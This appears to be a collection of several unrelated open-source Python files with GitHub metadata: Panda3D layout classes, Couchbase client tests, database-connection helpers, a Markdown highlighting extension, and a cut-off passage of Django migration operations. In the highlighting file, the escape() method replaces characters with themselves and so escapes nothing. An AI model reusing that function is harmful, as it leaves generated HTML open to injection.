"name": "Shell",
"bytes": "58"
}
],
"symlink_target": ""
}
|
'''
====================================================================================
Copyright 2013, 2014 Windy Darian (大地无敌), Studio "Sekai no Kagami"
(世界之镜制作组) of Seven Ocean Game Arts (七海游戏文化社
, 北京航空航天大学学生七海游戏文化社) @ http://sogarts.com
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
====================================================================================
Created on April 4, 2013
Layout classes
@author: Windy Darian (大地无敌)
'''
from panda3d.core import NodePath
from direct.gui.DirectFrame import DirectFrame
from elements import GuiElement
def getSize(obj):
'''
Returns the size of an object.
For a direct frame the result is the frameSize (left, right, bottom, top),
for Sogal GuiElement result is GuiElement.getFrameSize()
and for normal NodePath and other object types it returns (0,0,0,0)
'''
if isinstance(obj, DirectFrame):
size = obj['frameSize']
sx = obj.getSx()
sz = obj.getSz()
size = (size[0]*sx, size[1]*sx, size[2]*sz, size[3]*sz)
return size
elif isinstance(obj, GuiElement):
return obj.getFrameSize()
elif isinstance(obj, NodePath):
return (0, 0, 0, 0)
else:
return (0, 0, 0, 0)
class LayoutBase(NodePath):
def __init__(self, parent = None):
NodePath.__init__(self,self.__class__.__name__)
if not parent:
self.reparentTo(aspect2d) # @UndefinedVariable
else: self.reparentTo(parent)
self._itemlist = []
def append(self, directobj):
'''inherit this to append new object'''
pass
def resort(self):
'''inherit this to resort when needed'''
pass
def __iter__(self):
return iter(self._itemlist)
def __getitem__(self, index):
return self._itemlist[index]
def __setitem__(self, index, val):
self._itemlist[index] = val
self.resort()
def __delitem__(self, index):
'''note that the object is not destroyed'''
del self._itemlist[index]
self.resort()
def __getslice__(self, i, j):
return self._itemlist[i:j]
def __setslice__(self, i, j, value):
self._itemlist[i:j] = value
self.resort()
class HLayout(LayoutBase):
'''horizontal layout'''
def __init__(self,parent = None,margin = .05):
LayoutBase.__init__(self, parent)
self.__margin = margin
def append(self, directobj):
directobj.reparentTo(self)
if not self._itemlist:
self._applyLayout(directobj, None)
else:
self._applyLayout(directobj, self._itemlist[-1])
self._itemlist.append(directobj)
def resort(self):
last = None
for item in self:
self._applyLayout(item, last)
last = item
def _applyLayout(self,directobj,previous):
size = getSize(directobj)
if previous:
pSize = getSize(previous) #size of the provious object
directobj.setPos(previous.getPos()[0] +
pSize[1] +
self.__margin -
size[0]
,0,0)
else:
directobj.setPos(-size[0],0,0)
def getMargin(self):
return self.__margin
def setMargin(self, value):
self.__margin = value
self.resort()
class VLayout(LayoutBase):
'''vertical layout'''
def __init__(self,parent = None,margin = .05):
LayoutBase.__init__(self, parent)
self.__margin = margin
def append(self, directobj):
directobj.reparentTo(self)
if not self._itemlist:
self._applyLayout(directobj, None)
else:
self._applyLayout(directobj, self._itemlist[-1])
self._itemlist.append(directobj)
def resort(self):
last = None
for item in self:
self._applyLayout(item, last)
last = item
def _applyLayout(self,directobj,previous):
size = getSize(directobj)
if previous:
pSize = getSize(previous)
directobj.setPos(0,0,previous.getPos()[2] +
pSize[2] -
self.__margin -
size[3])
else:
directobj.setPos(0,0,-size[3])
def getMargin(self):
return self.__margin
def setMargin(self, value):
self.__margin = value
self.resort()
"""
#Deprecated
class HLayOut(LayoutBase):
'''horizontal layout for direct objects '''
def __init__(self,parent = None,margin = .5):
LayoutBase.__init__(self, parent)
self.__margin = margin
def append(self, directobj):
directobj.reparentTo(self)
if not self._itemlist:
self._applyLayout(directobj, None)
else:
self._applyLayout(directobj, self._itemlist[-1])
self._itemlist.append(directobj)
def resort(self):
last = None
for item in self:
self._applyLayout(item, last)
last = item
def _applyLayout(self,directobj,previous):
if previous:
directobj.setPos(previous.getPos()[0] + self.__margin,0,0)
else:
directobj.setPos(0,0,0)
def getMargin(self):
return self.__margin
def setMargin(self, value):
self.__margin = value
self.resort()
class VLayout(LayoutBase):
'''vertical layout for direct objects'''
def __init__(self,parent = None,margin = .05):
LayoutBase.__init__(self, parent)
self.__margin = margin
def append(self, directobj):
directobj.reparentTo(self)
if not self._itemlist:
self._applyLayout(directobj, None)
else:
self._applyLayout(directobj, self._itemlist[-1])
self._itemlist.append(directobj)
def resort(self):
last = None
for item in self:
self._applyLayout(item, last)
last = item
def _applyLayout(self,directobj,previous):
if previous:
directobj.setPos(0,0,previous.getPos()[2] - self.__margin)
else:
directobj.setPos(0,0,0)
def getMargin(self):
return self.__margin
def setMargin(self, value):
self.__margin = value
self.resort()
"""
"""
class DirectHLayout(LayoutBase):
'''horizontal layout for direct objects
Specially for DirectObjects for it can read its frame size
'''
def __init__(self,parent = None,margin = .05):
LayoutBase.__init__(self, parent)
self.__margin = margin
def append(self, directobj):
directobj.reparentTo(self)
if not self._itemlist:
self._applyLayout(directobj, None)
else:
self._applyLayout(directobj, self._itemlist[-1])
self._itemlist.append(directobj)
def resort(self):
last = None
for item in self:
self._applyLayout(item, last)
last = item
def _applyLayout(self,directobj,previous):
if previous:
directobj.setPos(previous.getPos()[0] +
previous['frameSize'][1] * previous.getSx() +
self.__margin -
directobj['frameSize'][0] * directobj.getSx()
,0,0)
else:
directobj.setPos(-directobj['frameSize'][0] * directobj.getSx(),0,0)
def getMargin(self):
return self.__margin
def setMargin(self, value):
self.__margin = value
self.resort()
class DirectVLayout(LayoutBase):
'''vertical layout for direct objects
Specially for DirectObjects for it can read its frame size
'''
def __init__(self,parent = None,margin = .05):
LayoutBase.__init__(self, parent)
self.__margin = margin
def append(self, directobj):
directobj.reparentTo(self)
if not self._itemlist:
self._applyLayout(directobj, None)
else:
self._applyLayout(directobj, self._itemlist[-1])
self._itemlist.append(directobj)
def resort(self):
last = None
for item in self:
self._applyLayout(item, last)
last = item
def _applyLayout(self,directobj,previous):
if previous:
directobj.setPos(0,0,previous.getPos()[2] +
previous['frameSize'][2] * previous.getSz() -
self.__margin -
directobj['frameSize'][3] * directobj.getSz())
else:
directobj.setPos(0,0,-directobj['frameSize'][3] * directobj.getSz())
def getMargin(self):
return self.__margin
def setMargin(self, value):
self.__margin = value
self.resort()
"""
|
{
"content_hash": "e438fd12d5a577a6dcaed57c662c3bd1",
"timestamp": "",
"source": "github",
"line_count": 330,
"max_line_length": 84,
"avg_line_length": 30.79090909090909,
"alnum_prop": 0.515205196338943,
"repo_name": "WindyDarian/Sogal",
"id": "b815e0bfa9c749d86a2a510116fd26a5091d267c",
"size": "10266",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sogasys/gui/layout.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "228118"
},
{
"name": "Shell",
"bytes": "258"
}
],
"symlink_target": ""
}
|
import pycb
import unittest
import requests
import json
import time
def bucket_list():
bucketList = []
r = requests.get("http://localhost:8091/pools/default/buckets")
for bucket in r.json():
bucketList.append(bucket['name'])
return bucketList
class TestPycb(unittest.TestCase):
@classmethod
def setUpClass(self):
self.cb = pycb.Couchbase("localhost", "Administrator", "password")
self.testBucket = self.cb.create("test")
@classmethod
def tearDownClass(self):
self.cb.delete("test")
def test_bad_connection_params(self):
cb = pycb.Couchbase("localhost", "Administrator", "passweird")
with self.assertRaises(pycb.PycbException):
self.testBucket = cb.bucket("test")
def test_create_and_delete_buckets(self):
bucketDefinitions = [
dict(
name="plain",
shouldFail=False,
params={}
),
dict(
name="bad",
shouldFail=True,
params=dict(
replicaNumber=100
)
),
dict(
name="memcached-bucket",
shouldFail=False,
params=dict(
bucketType="memcached"
)
)
]
for bucketDef in bucketDefinitions:
name = bucketDef['name']
params = bucketDef['params']
if bucketDef['shouldFail'] is True:
with self.assertRaises(pycb.PycbException):
self.cb.create(name, **params)
else:
self.cb.create(name, **params)
self.assertIn(name, bucket_list())
for bucketDef in bucketDefinitions:
if bucketDef['shouldFail'] is False:
self.cb.delete(bucketDef['name'])
self.assertNotIn(bucketDef['name'], bucket_list())
with self.assertRaises(pycb.PycbException):
self.cb.delete("nonexistentBucket")
def test_exception_string(self):
try:
raise pycb.PycbException(10, "it broke")
except pycb.PycbException as e:
self.assertEqual(e.error, 10)
self.assertEqual(e.errMsg, "it broke")
self.assertIn("it broke", e.__str__())
try:
raise pycb.PycbKeyNotFound(10, "it broke")
except pycb.PycbKeyNotFound as e:
self.assertEqual(e.error, 10)
self.assertEqual(e.errMsg, "it broke")
self.assertIn("it broke", e.__str__())
try:
raise pycb.PycbKeyExists(10, "it broke")
except pycb.PycbKeyExists as e:
self.assertEqual(e.error, 10)
self.assertEqual(e.errMsg, "it broke")
self.assertIn("it broke", e.__str__())
def test_get_view(self):
url = "http://Administrator:password@localhost:" \
"8092/test/_design/dev_test"
mapFunction = dict(map='function(doc, meta){if (meta.type == "json")'
'{emit(doc.key, doc.data);}}')
view = dict(test=mapFunction)
payload = dict(views=view)
headers = {'content-type': 'application/json'}
requests.put(
url,
data=json.dumps(payload, indent=4),
headers=headers
)
self.testBucket.set("testViewKey1", 0, 0,
'{"key": "key1", "data": "somedata"}')
self.testBucket.set("testViewKey2", 0, 0,
'{"key": "key2", "data": "somedata"}')
self.testBucket.set("testViewKey3", 0, 0,
'{"key": "key3", "data": "somedata"}')
params = dict(
stale="false",
startkey="key1",
endkey="key3"
)
time.sleep(1)
rows = self.testBucket.view("_design/dev_test/_view/test", **params)
self.assertTrue(len(rows) >= 3)
with self.assertRaises(pycb.PycbException):
self.testBucket.view("not_a_design_document")
def test_set(self):
self.testBucket.set("setTestKey", 0, 0, '{"data": "setdata"}')
data = self.testBucket.get("setTestKey")[2]
self.assertEqual(data, '{"data": "setdata"}')
def test_add(self):
self.testBucket.add("addTestKey", 0, 0, '{"data": "adddata"}')
data = self.testBucket.get("addTestKey")[2]
self.assertEqual(data, '{"data": "adddata"}')
with self.assertRaises(pycb.PycbKeyExists):
self.testBucket.add("addTestKey", 0, 0, '{"data": "adddata"}')
def test_replace(self):
with self.assertRaises(pycb.PycbKeyNotFound):
self.testBucket.replace("replaceTestKey", 0, 0,
'{"data": "replacedata"}')
self.testBucket.set("replaceTestKey", 0, 0,
'{"data": "notreplacedata"}')
self.testBucket.replace("replaceTestKey", 0, 0,
'{"data": "replacedata"}')
data = self.testBucket.get("replaceTestKey")[2]
self.assertEqual(data, '{"data": "replacedata"}')
def test_append(self):
self.testBucket.set("appendTestKey", 0, 0, "not JSON")
self.testBucket.append("appendTestKey", ", appended")
data = self.testBucket.get("appendTestKey")[2]
self.assertEqual(data, "not JSON, appended")
def test_prepend(self):
self.testBucket.set("prependTestKey", 0, 0, "not JSON")
self.testBucket.prepend("prependTestKey", "prepended, ")
data = self.testBucket.get("prependTestKey")[2]
self.assertEqual(data, "prepended, not JSON")
def test_get(self):
self.testBucket.set("getTestKey", 0, 0, '{"data": "getData"}')
data = self.testBucket.get("getTestKey")[2]
self.assertEqual(data, '{"data": "getData"}')
def test_delete(self):
self.testBucket.set("deleteTestKey", 0, 0, '{"data": "deleteData"}')
self.testBucket.delete("deleteTestKey")
with self.assertRaises(pycb.PycbKeyNotFound):
self.testBucket.get("deleteTestKey")[2]
with self.assertRaises(pycb.PycbKeyNotFound):
self.testBucket.delete("deleteTestKey")
def test_increment_and_decrement(self):
self.testBucket.incr("countKey")
self.assertEqual(self.testBucket.get("countKey")[2], 0)
self.testBucket.incr("countKey", amt=3)
self.assertEqual(self.testBucket.get("countKey")[2], 3)
self.testBucket.decr("countKey")
self.assertEqual(self.testBucket.get("countKey")[2], 2)
self.testBucket.set("countKey", 0, 0, "non-numeric")
with self.assertRaises(pycb.PycbException):
self.testBucket.incr("countKey")
def test_stats(self):
results = self.testBucket.stats()
self.assertIsInstance(results, list)
self.assertTrue(len(results) >= 1)
def test_flush(self):
results = self.testBucket.flush()
self.assertIsInstance(results, list)
self.assertTrue(len(results) >= 1)
def test_memcached_bucket(self):
params = dict(bucketType="memcached")
memcacheBucket = self.cb.create("memcacheBucket", **params)
self.assertIn("memcacheBucket", bucket_list())
memcacheBucket.add("addTestKey", 0, 0, '{"data": "adddata"}')
data = memcacheBucket.get("addTestKey")[2]
self.assertEqual(data, '{"data": "adddata"}')
self.cb.delete("memcacheBucket")
def test_connect_with_timeout(self):
bucket = self.cb.bucket("test", timeout=10)
bucket.set("getTestKey", 0, 0, '{"data": "getData"}')
data = bucket.get("getTestKey")[2]
self.assertEqual(data, '{"data": "getData"}')
cb = pycb.Couchbase("127.0.0.2", "Administrator", "password")
with self.assertRaises(pycb.PycbException):
bucket = cb.bucket("test", timeout=2)
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "4a4836725c03000e57aff1d2dbfeebcd",
"timestamp": "",
"source": "github",
"line_count": 217,
"max_line_length": 77,
"avg_line_length": 36.89861751152074,
"alnum_prop": 0.5640064943174722,
"repo_name": "yamingd/pycb",
"id": "fe2bc1e309f4fc363abcd3a1794e7a33069b82da",
"size": "8007",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "tests/test_pycb.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
}
|
import urllib
import sqlalchemy
import healthcareai.common.database_library_validators as hcai_db_library
try:
# Note we don't want to force pyodbc as a requirement
import pyodbc
pyodbc_is_loaded = True
except ImportError:
pyodbc_is_loaded = False
try:
# Note we don't want to force sqlite3 as a requirement
import sqlite3
sqlite3_is_loaded = True
except ImportError:
sqlite3_is_loaded = False
def build_mssql_trusted_connection_string(server, database):
""" Given a server and database name, build a Trusted Connection MSSQL connection string """
return 'DRIVER={SQL Server Native Client 11.0};Server=' + server + ';Database=' + database + ';Trusted_Connection=yes;'
def build_mysql_connection_string(server, database, userid, password):
# TODO stub
pass
# return 'Server={};Database={};Uid={};Pwd={}; '.format(server, database, userid, password)
def build_sqlite_engine(file_path):
""" Build an sqlite engine. """
hcai_db_library.validate_sqlite3_is_loaded()
engine = sqlite3.connect(file_path)
return engine
def build_sqlite_in_memory_connection_string():
# TODO stub
pass
# return 'Data Source=:memory:;Version=3;New=True;'
def build_mssql_engine_using_trusted_connections(server, database):
"""
Given a server and database name, build a Trusted Connection MSSQL database engine. NOTE: Requires `pyodbc`
Args:
server (str): Server name
database (str): Database name
Returns:
sqlalchemy.engine.base.Engine: an sqlalchemy connection engine
"""
hcai_db_library.validate_pyodbc_is_loaded()
connection_string = build_mssql_trusted_connection_string(server, database)
params = urllib.parse.quote_plus(connection_string)
engine = sqlalchemy.create_engine("mssql+pyodbc:///?odbc_connect={}".format(params))
return engine
|
{
"content_hash": "2f9b406b18cedcce83245e7fda6005c0",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 123,
"avg_line_length": 29.453125,
"alnum_prop": 0.7023872679045093,
"repo_name": "mxlei01/healthcareai-py",
"id": "433165b122e9a720d9a393aced1811a298241fc8",
"size": "1885",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "healthcareai/common/database_connections.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "4382"
},
{
"name": "Makefile",
"bytes": "609"
},
{
"name": "PowerShell",
"bytes": "7194"
},
{
"name": "Python",
"bytes": "250000"
},
{
"name": "Shell",
"bytes": "1552"
}
],
"symlink_target": ""
}
|
"""
Highlight.
A library for managing code highlighting.
All Changes Copyright 2014-2017 Isaac Muse.
---
CodeHilite Extension for Python-Markdown
========================================
Adds code/syntax highlighting to standard Python-Markdown code blocks.
See <https://pythonhosted.org/Markdown/extensions/code_hilite.html>
for documentation.
Original code Copyright 2006-2008 [Waylan Limberg](http://achinghead.com/).
All changes Copyright 2008-2014 The Python Markdown Project
License: [BSD](http://www.opensource.org/licenses/bsd-license.php)
"""
from __future__ import absolute_import
from __future__ import unicode_literals
from markdown import Extension
from markdown.treeprocessors import Treeprocessor
from markdown import util as md_util
import copy
from collections import OrderedDict
try:
from pygments import highlight
from pygments.lexers import get_lexer_by_name, guess_lexer
from pygments.formatters import find_formatter_class
HtmlFormatter = find_formatter_class('html')
pygments = True
except ImportError: # pragma: no cover
pygments = False
try:
from markdown.extensions.codehilite import CodeHiliteExtension
except Exception: # pragma: no cover
CodeHiliteExtension = None
CODE_WRAP = '<pre%s><code%s>%s</code></pre>'
CLASS_ATTR = ' class="%s"'
DEFAULT_CONFIG = {
'use_pygments': [
True,
'Use Pygments to highlight code blocks. '
'Disable if using a JavaScript library. '
'Default: True'
],
'guess_lang': [
False,
"Automatic language detection - Default: True"
],
'css_class': [
'highlight',
"CSS class to apply to wrapper element."
],
'pygments_style': [
'default',
'Pygments HTML Formatter Style '
'(color scheme) - Default: default'
],
'noclasses': [
False,
'Use inline styles instead of CSS classes - '
'Default false'
],
'linenums': [
False,
'Display line numbers in block code output (not inline) - Default: False'
],
'extend_pygments_lang': [
[],
'Extend pygments language with special language entry - Default: {}'
]
}
if pygments:
class InlineHtmlFormatter(HtmlFormatter):
"""Format the code blocks."""
def wrap(self, source, outfile):
"""Overload wrap."""
return self._wrap_code(source)
def _wrap_code(self, source):
"""Return source, but do not wrap in inline <code> block."""
yield 0, ''
for i, t in source:
yield i, t.strip()
yield 0, ''
class Highlight(object):
"""Highlight class."""
def __init__(
self, guess_lang=True, pygments_style='default', use_pygments=True,
noclasses=False, extend_pygments_lang=None, linenums=False
):
"""Initialize."""
self.guess_lang = guess_lang
self.pygments_style = pygments_style
self.use_pygments = use_pygments
self.noclasses = noclasses
self.linenums = linenums
self.linenums_style = 'table'
if extend_pygments_lang is None:
extend_pygments_lang = []
self.extend_pygments_lang = {}
for language in extend_pygments_lang:
if isinstance(language, (dict, OrderedDict)):
name = language.get('name')
if name is not None and name not in self.extend_pygments_lang:
self.extend_pygments_lang[name] = [
language.get('lang'),
language.get('options', {})
]
def get_extended_language(self, language):
"""Get extended language."""
return self.extend_pygments_lang.get(language, (language, {}))
def get_lexer(self, src, language):
"""Get the Pygments lexer."""
if language:
language, lexer_options = self.get_extended_language(language)
else:
lexer_options = {}
# Try and get lexer by the name given.
try:
lexer = get_lexer_by_name(language, **lexer_options)
except Exception:
lexer = None
if lexer is None:
if self.guess_lang:
lexer = guess_lexer(src)
else:
lexer = get_lexer_by_name('text')
return lexer
def escape(self, txt):
"""Basic html escaping."""
txt = txt.replace('&', '&')
txt = txt.replace('<', '<')
txt = txt.replace('>', '>')
txt = txt.replace('"', '"')
return txt
def highlight(
self, src, language, css_class='highlight', hl_lines=None,
linestart=-1, linestep=-1, linespecial=-1, inline=False
):
"""Highlight code."""
# Convert with Pygments.
if pygments and self.use_pygments:
# Setup language lexer.
lexer = self.get_lexer(src, language)
# Setup line specific settings.
linenums = self.linenums_style if (self.linenums or linestart >= 0) and not inline > 0 else False
if not linenums or linestep < 1:
linestep = 1
if not linenums or linestart < 1:
linestart = 1
if not linenums or linespecial < 0:
linespecial = 0
if hl_lines is None or inline:
hl_lines = []
# Setup formatter
html_formatter = InlineHtmlFormatter if inline else HtmlFormatter
formatter = html_formatter(
cssclass=css_class,
linenos=linenums,
linenostart=linestart,
linenostep=linestep,
linenospecial=linespecial,
style=self.pygments_style,
noclasses=self.noclasses,
hl_lines=hl_lines
)
# Convert
code = highlight(src, lexer, formatter)
if inline:
class_str = css_class
elif inline:
# Format inline code for a JavaScript Syntax Highlighter by specifying language.
code = self.escape(src)
classes = [css_class] if css_class else []
if language:
classes.append('language-%s' % language)
class_str = ''
if len(classes):
class_str = ' '.join(classes)
else:
# Format block code for a JavaScript Syntax Highlighter by specifying language.
classes = []
linenums = self.linenums_style if (self.linenums or linestart >= 0) and not inline > 0 else False
if language:
classes.append('language-%s' % language)
if linenums:
classes.append('linenums')
class_str = ''
if classes:
class_str = CLASS_ATTR % ' '.join(classes)
higlight_class = (CLASS_ATTR % css_class) if css_class else ''
code = CODE_WRAP % (higlight_class, class_str, self.escape(src))
if inline:
el = md_util.etree.Element('code', {'class': class_str} if class_str else {})
el.text = code
return el
else:
return code.strip()
def get_hl_settings(md):
"""Get the specified extension."""
target = None
for ext in md.registeredExtensions:
if isinstance(ext, HighlightExtension):
target = ext.getConfigs()
break
if target is None:
for ext in md.registeredExtensions:
if isinstance(ext, CodeHiliteExtension):
target = ext.getConfigs()
break
if target is None:
target = {}
config_clone = copy.deepcopy(DEFAULT_CONFIG)
for k, v in config_clone.items():
target[k] = config_clone[k][0]
return target
class HighlightTreeprocessor(Treeprocessor):
"""Highlight source code in code blocks."""
def run(self, root):
"""Find code blocks and store in htmlStash."""
blocks = root.iter('pre')
for block in blocks:
if len(block) == 1 and block[0].tag == 'code':
code = Highlight(
guess_lang=self.config['guess_lang'],
pygments_style=self.config['pygments_style'],
use_pygments=self.config['use_pygments'],
noclasses=self.config['noclasses'],
linenums=self.config['linenums'],
extend_pygments_lang=self.config['extend_pygments_lang']
)
placeholder = self.markdown.htmlStash.store(
code.highlight(
block[0].text,
'',
self.config['css_class']
),
safe=True
)
# Clear codeblock in etree instance
block.clear()
# Change to p element which will later
# be removed when inserting raw html
block.tag = 'p'
block.text = placeholder
class HighlightExtension(Extension):
"""Configure highlight settins globally."""
def __init__(self, *args, **kwargs):
"""Initialize."""
self.config = copy.deepcopy(DEFAULT_CONFIG)
super(HighlightExtension, self).__init__(*args, **kwargs)
def extendMarkdown(self, md, md_globals):
"""Add support for code highlighting."""
ht = HighlightTreeprocessor(md)
ht.config = self.getConfigs()
md.treeprocessors.add("indent-highlight", ht, "<inline")
md.registerExtension(self)
def makeExtension(*args, **kwargs):
"""Return extension."""
return HighlightExtension(*args, **kwargs)
|
{
"content_hash": "fe19dc6c486d388ac2ff01f8d130d50a",
"timestamp": "",
"source": "github",
"line_count": 310,
"max_line_length": 109,
"avg_line_length": 31.729032258064517,
"alnum_prop": 0.5595770638470923,
"repo_name": "brunobergher/dotfiles",
"id": "280d3228c2334d8d8f232a0a298a28835ac78c60",
"size": "9836",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "sublime/pymdownx/st3/pymdownx/highlight.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "7129"
},
{
"name": "JavaScript",
"bytes": "2189"
},
{
"name": "Python",
"bytes": "5640214"
},
{
"name": "Ruby",
"bytes": "13415"
},
{
"name": "Shell",
"bytes": "27223"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import models
from django.db.migrations.operations.base import Operation
from django.db.migrations.state import ModelState
from django.db.models.options import normalize_together
from django.utils import six
from django.utils.functional import cached_property
from .fields import (
AddField, AlterField, FieldOperation, RemoveField, RenameField,
)
def _check_for_duplicates(arg_name, objs):
used_vals = set()
for val in objs:
if val in used_vals:
raise ValueError(
"Found duplicate value %s in CreateModel %s argument." % (val, arg_name)
)
used_vals.add(val)
class ModelOperation(Operation):
def __init__(self, name):
self.name = name
@cached_property
def name_lower(self):
return self.name.lower()
def references_model(self, name, app_label=None):
return name.lower() == self.name_lower
def reduce(self, operation, in_between, app_label=None):
return (
super(ModelOperation, self).reduce(operation, in_between, app_label=app_label) or
not operation.references_model(self.name, app_label)
)
class CreateModel(ModelOperation):
"""
Create a model's table.
"""
serialization_expand_args = ['fields', 'options', 'managers']
def __init__(self, name, fields, options=None, bases=None, managers=None):
self.fields = fields
self.options = options or {}
self.bases = bases or (models.Model,)
self.managers = managers or []
super(CreateModel, self).__init__(name)
# Sanity-check that there are no duplicated field names, bases, or
# manager names
_check_for_duplicates('fields', (name for name, _ in self.fields))
_check_for_duplicates('bases', (
base._meta.label_lower if hasattr(base, '_meta') else
base.lower() if isinstance(base, six.string_types) else base
for base in self.bases
))
_check_for_duplicates('managers', (name for name, _ in self.managers))
def deconstruct(self):
kwargs = {
'name': self.name,
'fields': self.fields,
}
if self.options:
kwargs['options'] = self.options
if self.bases and self.bases != (models.Model,):
kwargs['bases'] = self.bases
if self.managers and self.managers != [('objects', models.Manager())]:
kwargs['managers'] = self.managers
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
state.add_model(ModelState(
app_label,
self.name,
list(self.fields),
dict(self.options),
tuple(self.bases),
list(self.managers),
))
def database_forwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.create_model(model)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
model = from_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.delete_model(model)
def describe(self):
return "Create %smodel %s" % ("proxy " if self.options.get("proxy", False) else "", self.name)
def references_model(self, name, app_label=None):
name_lower = name.lower()
if name_lower == self.name_lower:
return True
# Check we didn't inherit from the model
models_to_check = [base for base in self.bases if base is not models.Model]
# Check we have no FKs/M2Ms with it
for fname, field in self.fields:
if field.remote_field:
models_to_check.append(field.remote_field.model)
# Now go over all the models and check against them
for model in models_to_check:
model_app_label, model_name = self.model_to_key(model)
if model_name.lower() == name_lower:
if app_label is None or not model_app_label or model_app_label == app_label:
return True
return False
def model_to_key(self, model):
"""
Take either a model class or an "app_label.ModelName" string
and return (app_label, object_name).
"""
if isinstance(model, six.string_types):
return model.split(".", 1)
else:
return model._meta.app_label, model._meta.object_name
def reduce(self, operation, in_between, app_label=None):
if (isinstance(operation, DeleteModel) and
self.name_lower == operation.name_lower and
not self.options.get("proxy", False)):
return []
elif isinstance(operation, RenameModel) and self.name_lower == operation.old_name_lower:
return [
CreateModel(
operation.new_name,
fields=self.fields,
options=self.options,
bases=self.bases,
managers=self.managers,
),
]
elif isinstance(operation, FieldOperation) and self.name_lower == operation.model_name_lower:
if isinstance(operation, AddField):
# Don't allow optimizations of FKs through models they reference
if hasattr(operation.field, "remote_field") and operation.field.remote_field:
for between in in_between:
# Check that it doesn't point to the model
app_label, object_name = self.model_to_key(operation.field.remote_field.model)
if between.references_model(object_name, app_label):
return False
# Check that it's not through the model
if getattr(operation.field.remote_field, "through", None):
app_label, object_name = self.model_to_key(operation.field.remote_field.through)
if between.references_model(object_name, app_label):
return False
return [
CreateModel(
self.name,
fields=self.fields + [(operation.name, operation.field)],
options=self.options,
bases=self.bases,
managers=self.managers,
),
]
elif isinstance(operation, AlterField):
return [
CreateModel(
self.name,
fields=[
(n, operation.field if n == operation.name else v)
for n, v in self.fields
],
options=self.options,
bases=self.bases,
managers=self.managers,
),
]
elif isinstance(operation, RemoveField):
return [
CreateModel(
self.name,
fields=[
(n, v)
for n, v in self.fields
if n.lower() != operation.name_lower
],
options=self.options,
bases=self.bases,
managers=self.managers,
),
]
elif isinstance(operation, RenameField):
return [
CreateModel(
self.name,
fields=[
(operation.new_name if n == operation.old_name else n, v)
for n, v in self.fields
],
options=self.options,
bases=self.bases,
managers=self.managers,
),
]
return super(CreateModel, self).reduce(operation, in_between, app_label=app_label)
class DeleteModel(ModelOperation):
"""
Drops a model's table.
"""
def deconstruct(self):
kwargs = {
'name': self.name,
}
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
state.remove_model(app_label, self.name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
model = from_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.delete_model(model)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.create_model(model)
def describe(self):
return "Delete model %s" % (self.name, )
class RenameModel(ModelOperation):
"""
Renames a model.
"""
def __init__(self, old_name, new_name):
self.old_name = old_name
self.new_name = new_name
super(RenameModel, self).__init__(old_name)
@cached_property
def old_name_lower(self):
return self.old_name.lower()
@cached_property
def new_name_lower(self):
return self.new_name.lower()
def deconstruct(self):
kwargs = {
'old_name': self.old_name,
'new_name': self.new_name,
}
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
apps = state.apps
model = apps.get_model(app_label, self.old_name)
model._meta.apps = apps
# Get all of the related objects we need to repoint
all_related_objects = (
f for f in model._meta.get_fields(include_hidden=True)
if f.auto_created and not f.concrete and (not f.hidden or f.many_to_many)
)
# Rename the model
state.models[app_label, self.new_name_lower] = state.models[app_label, self.old_name_lower]
state.models[app_label, self.new_name_lower].name = self.new_name
state.remove_model(app_label, self.old_name_lower)
# Repoint the FKs and M2Ms pointing to us
for related_object in all_related_objects:
if related_object.model is not model:
# The model being renamed does not participate in this relation
# directly. Rather, a superclass does.
continue
# Use the new related key for self referential related objects.
if related_object.related_model == model:
related_key = (app_label, self.new_name_lower)
else:
related_key = (
related_object.related_model._meta.app_label,
related_object.related_model._meta.model_name,
)
new_fields = []
for name, field in state.models[related_key].fields:
if name == related_object.field.name:
field = field.clone()
field.remote_field.model = "%s.%s" % (app_label, self.new_name)
new_fields.append((name, field))
state.models[related_key].fields = new_fields
state.reload_model(*related_key)
# Repoint M2Ms with through pointing to us
related_models = {
f.remote_field.model for f in model._meta.fields
if getattr(f.remote_field, 'model', None)
}
model_name = '%s.%s' % (app_label, self.old_name)
for related_model in related_models:
if related_model == model:
related_key = (app_label, self.new_name_lower)
else:
related_key = (related_model._meta.app_label, related_model._meta.model_name)
new_fields = []
changed = False
for name, field in state.models[related_key].fields:
if field.is_relation and field.many_to_many and field.remote_field.through == model_name:
field = field.clone()
field.remote_field.through = '%s.%s' % (app_label, self.new_name)
changed = True
new_fields.append((name, field))
if changed:
state.models[related_key].fields = new_fields
state.reload_model(*related_key)
state.reload_model(app_label, self.new_name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
new_model = to_state.apps.get_model(app_label, self.new_name)
if self.allow_migrate_model(schema_editor.connection.alias, new_model):
old_model = from_state.apps.get_model(app_label, self.old_name)
